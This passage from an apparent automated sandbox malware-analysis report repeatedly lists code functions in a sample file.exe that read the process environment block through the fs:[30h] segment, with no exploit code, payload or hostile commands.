                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]2_2_0167E53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]2_2_0167E53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]2_2_0167E53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]2_2_0167E53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E53E mov eax, dword ptr fs:[00000030h]2_2_0167E53E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6500 mov eax, dword ptr fs:[00000030h]2_2_016E6500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01724500 mov eax, dword ptr fs:[00000030h]2_2_01724500
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E5E7 mov eax, dword ptr fs:[00000030h]2_2_0167E5E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016525E0 mov eax, dword ptr fs:[00000030h]2_2_016525E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C5ED mov eax, dword ptr fs:[00000030h]2_2_0168C5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C5ED mov eax, dword ptr fs:[00000030h]2_2_0168C5ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E5CF mov eax, dword ptr fs:[00000030h]2_2_0168E5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E5CF mov eax, dword ptr fs:[00000030h]2_2_0168E5CF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016565D0 mov eax, dword ptr fs:[00000030h]2_2_016565D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A5D0 mov eax, dword ptr fs:[00000030h]2_2_0168A5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A5D0 mov eax, dword ptr fs:[00000030h]2_2_0168A5D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]2_2_016D05A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]2_2_016D05A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D05A7 mov eax, dword ptr fs:[00000030h]2_2_016D05A7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016745B1 mov eax, dword ptr fs:[00000030h]2_2_016745B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016745B1 mov eax, dword ptr fs:[00000030h]2_2_016745B1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01684588 mov eax, dword ptr fs:[00000030h]2_2_01684588
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01652582 mov eax, dword ptr fs:[00000030h]2_2_01652582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01652582 mov ecx, dword ptr fs:[00000030h]2_2_01652582
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E59C mov eax, dword ptr fs:[00000030h]2_2_0168E59C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DC460 mov ecx, dword ptr fs:[00000030h]2_2_016DC460
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]2_2_0167A470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]2_2_0167A470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167A470 mov eax, dword ptr fs:[00000030h]2_2_0167A470
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170A456 mov eax, dword ptr fs:[00000030h]2_2_0170A456
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168E443 mov eax, dword ptr fs:[00000030h]2_2_0168E443
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164645D mov eax, dword ptr fs:[00000030h]2_2_0164645D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167245A mov eax, dword ptr fs:[00000030h]2_2_0167245A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164C427 mov eax, dword ptr fs:[00000030h]2_2_0164C427
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]2_2_0164E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]2_2_0164E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164E420 mov eax, dword ptr fs:[00000030h]2_2_0164E420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D6420 mov eax, dword ptr fs:[00000030h]2_2_016D6420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A430 mov eax, dword ptr fs:[00000030h]2_2_0168A430
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]2_2_01688402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]2_2_01688402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01688402 mov eax, dword ptr fs:[00000030h]2_2_01688402
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016504E5 mov ecx, dword ptr fs:[00000030h]2_2_016504E5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016564AB mov eax, dword ptr fs:[00000030h]2_2_016564AB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016844B0 mov ecx, dword ptr fs:[00000030h]2_2_016844B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DA4B0 mov eax, dword ptr fs:[00000030h]2_2_016DA4B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0170A49A mov eax, dword ptr fs:[00000030h]2_2_0170A49A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01658770 mov eax, dword ptr fs:[00000030h]2_2_01658770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01660770 mov eax, dword ptr fs:[00000030h]2_2_01660770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168674D mov esi, dword ptr fs:[00000030h]2_2_0168674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168674D mov eax, dword ptr fs:[00000030h]2_2_0168674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168674D mov eax, dword ptr fs:[00000030h]2_2_0168674D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DE75D mov eax, dword ptr fs:[00000030h]2_2_016DE75D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650750 mov eax, dword ptr fs:[00000030h]2_2_01650750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D4755 mov eax, dword ptr fs:[00000030h]2_2_016D4755
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692750 mov eax, dword ptr fs:[00000030h]2_2_01692750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692750 mov eax, dword ptr fs:[00000030h]2_2_01692750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C720 mov eax, dword ptr fs:[00000030h]2_2_0168C720
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C720 mov eax, dword ptr fs:[00000030h]2_2_0168C720
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168273C mov eax, dword ptr fs:[00000030h]2_2_0168273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168273C mov ecx, dword ptr fs:[00000030h]2_2_0168273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168273C mov eax, dword ptr fs:[00000030h]2_2_0168273C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CC730 mov eax, dword ptr fs:[00000030h]2_2_016CC730
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C700 mov eax, dword ptr fs:[00000030h]2_2_0168C700
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650710 mov eax, dword ptr fs:[00000030h]2_2_01650710
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01680710 mov eax, dword ptr fs:[00000030h]2_2_01680710
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]2_2_016727ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]2_2_016727ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016727ED mov eax, dword ptr fs:[00000030h]2_2_016727ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DE7E1 mov eax, dword ptr fs:[00000030h]2_2_016DE7E1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016547FB mov eax, dword ptr fs:[00000030h]2_2_016547FB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016547FB mov eax, dword ptr fs:[00000030h]2_2_016547FB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165C7C0 mov eax, dword ptr fs:[00000030h]2_2_0165C7C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D07C3 mov eax, dword ptr fs:[00000030h]2_2_016D07C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016507AF mov eax, dword ptr fs:[00000030h]2_2_016507AF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_017047A0 mov eax, dword ptr fs:[00000030h]2_2_017047A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F678E mov eax, dword ptr fs:[00000030h]2_2_016F678E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A660 mov eax, dword ptr fs:[00000030h]2_2_0168A660
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A660 mov eax, dword ptr fs:[00000030h]2_2_0168A660
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01682674 mov eax, dword ptr fs:[00000030h]2_2_01682674
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171866E mov eax, dword ptr fs:[00000030h]2_2_0171866E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171866E mov eax, dword ptr fs:[00000030h]2_2_0171866E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166C640 mov eax, dword ptr fs:[00000030h]2_2_0166C640
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166E627 mov eax, dword ptr fs:[00000030h]2_2_0166E627
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01686620 mov eax, dword ptr fs:[00000030h]2_2_01686620
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01688620 mov eax, dword ptr fs:[00000030h]2_2_01688620
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165262C mov eax, dword ptr fs:[00000030h]2_2_0165262C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE609 mov eax, dword ptr fs:[00000030h]2_2_016CE609
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0166260B mov eax, dword ptr fs:[00000030h]2_2_0166260B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01692619 mov eax, dword ptr fs:[00000030h]2_2_01692619
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D06F1 mov eax, dword ptr fs:[00000030h]2_2_016D06F1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D06F1 mov eax, dword ptr fs:[00000030h]2_2_016D06F1
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]2_2_016CE6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]2_2_016CE6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]2_2_016CE6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE6F2 mov eax, dword ptr fs:[00000030h]2_2_016CE6F2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0168A6C7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A6C7 mov eax, dword ptr fs:[00000030h]2_2_0168A6C7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C6A6 mov eax, dword ptr fs:[00000030h]2_2_0168C6A6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016866B0 mov eax, dword ptr fs:[00000030h]2_2_016866B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654690 mov eax, dword ptr fs:[00000030h]2_2_01654690
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654690 mov eax, dword ptr fs:[00000030h]2_2_01654690
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]2_2_01676962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]2_2_01676962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01676962 mov eax, dword ptr fs:[00000030h]2_2_01676962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169096E mov eax, dword ptr fs:[00000030h]2_2_0169096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169096E mov edx, dword ptr fs:[00000030h]2_2_0169096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0169096E mov eax, dword ptr fs:[00000030h]2_2_0169096E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DC97C mov eax, dword ptr fs:[00000030h]2_2_016DC97C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F4978 mov eax, dword ptr fs:[00000030h]2_2_016F4978
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F4978 mov eax, dword ptr fs:[00000030h]2_2_016F4978
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D0946 mov eax, dword ptr fs:[00000030h]2_2_016D0946
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E892B mov eax, dword ptr fs:[00000030h]2_2_016E892B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D892A mov eax, dword ptr fs:[00000030h]2_2_016D892A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE908 mov eax, dword ptr fs:[00000030h]2_2_016CE908
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CE908 mov eax, dword ptr fs:[00000030h]2_2_016CE908
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01648918 mov eax, dword ptr fs:[00000030h]2_2_01648918
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01648918 mov eax, dword ptr fs:[00000030h]2_2_01648918
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DC912 mov eax, dword ptr fs:[00000030h]2_2_016DC912
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DE9E0 mov eax, dword ptr fs:[00000030h]2_2_016DE9E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016829F9 mov eax, dword ptr fs:[00000030h]2_2_016829F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016829F9 mov eax, dword ptr fs:[00000030h]2_2_016829F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171A9D3 mov eax, dword ptr fs:[00000030h]2_2_0171A9D3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E69C0 mov eax, dword ptr fs:[00000030h]2_2_016E69C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0165A9D0 mov eax, dword ptr fs:[00000030h]2_2_0165A9D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016849D0 mov eax, dword ptr fs:[00000030h]2_2_016849D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016629A0 mov eax, dword ptr fs:[00000030h]2_2_016629A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016509AD mov eax, dword ptr fs:[00000030h]2_2_016509AD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016509AD mov eax, dword ptr fs:[00000030h]2_2_016509AD
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D89B3 mov esi, dword ptr fs:[00000030h]2_2_016D89B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D89B3 mov eax, dword ptr fs:[00000030h]2_2_016D89B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016D89B3 mov eax, dword ptr fs:[00000030h]2_2_016D89B3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6870 mov eax, dword ptr fs:[00000030h]2_2_016E6870
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6870 mov eax, dword ptr fs:[00000030h]2_2_016E6870
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DE872 mov eax, dword ptr fs:[00000030h]2_2_016DE872
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DE872 mov eax, dword ptr fs:[00000030h]2_2_016DE872
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01662840 mov ecx, dword ptr fs:[00000030h]2_2_01662840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654859 mov eax, dword ptr fs:[00000030h]2_2_01654859
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01654859 mov eax, dword ptr fs:[00000030h]2_2_01654859
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01680854 mov eax, dword ptr fs:[00000030h]2_2_01680854
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov ecx, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01672835 mov eax, dword ptr fs:[00000030h]2_2_01672835
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F483A mov eax, dword ptr fs:[00000030h]2_2_016F483A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F483A mov eax, dword ptr fs:[00000030h]2_2_016F483A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]2_2_0168A830
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DC810 mov eax, dword ptr fs:[00000030h]2_2_016DC810
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C8F9 mov eax, dword ptr fs:[00000030h]2_2_0168C8F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0168C8F9 mov eax, dword ptr fs:[00000030h]2_2_0168C8F9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171A8E4 mov eax, dword ptr fs:[00000030h]2_2_0171A8E4
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167E8C0 mov eax, dword ptr fs:[00000030h]2_2_0167E8C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01650887 mov eax, dword ptr fs:[00000030h]2_2_01650887
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016DC89D mov eax, dword ptr fs:[00000030h]2_2_016DC89D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0164CB7E mov eax, dword ptr fs:[00000030h]2_2_0164CB7E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016F8B42 mov eax, dword ptr fs:[00000030h]2_2_016F8B42
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6B40 mov eax, dword ptr fs:[00000030h]2_2_016E6B40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016E6B40 mov eax, dword ptr fs:[00000030h]2_2_016E6B40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0171AB40 mov eax, dword ptr fs:[00000030h]2_2_0171AB40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01704B4B mov eax, dword ptr fs:[00000030h]2_2_01704B4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01704B4B mov eax, dword ptr fs:[00000030h]2_2_01704B4B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016FEB50 mov eax, dword ptr fs:[00000030h]2_2_016FEB50
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167EB20 mov eax, dword ptr fs:[00000030h]2_2_0167EB20
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0167EB20 mov eax, dword ptr fs:[00000030h]2_2_0167EB20
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01718B28 mov eax, dword ptr fs:[00000030h]2_2_01718B28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01718B28 mov eax, dword ptr fs:[00000030h]2_2_01718B28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_016CEB1D mov eax, dword ptr fs:[00000030h]2_2_016CEB1D
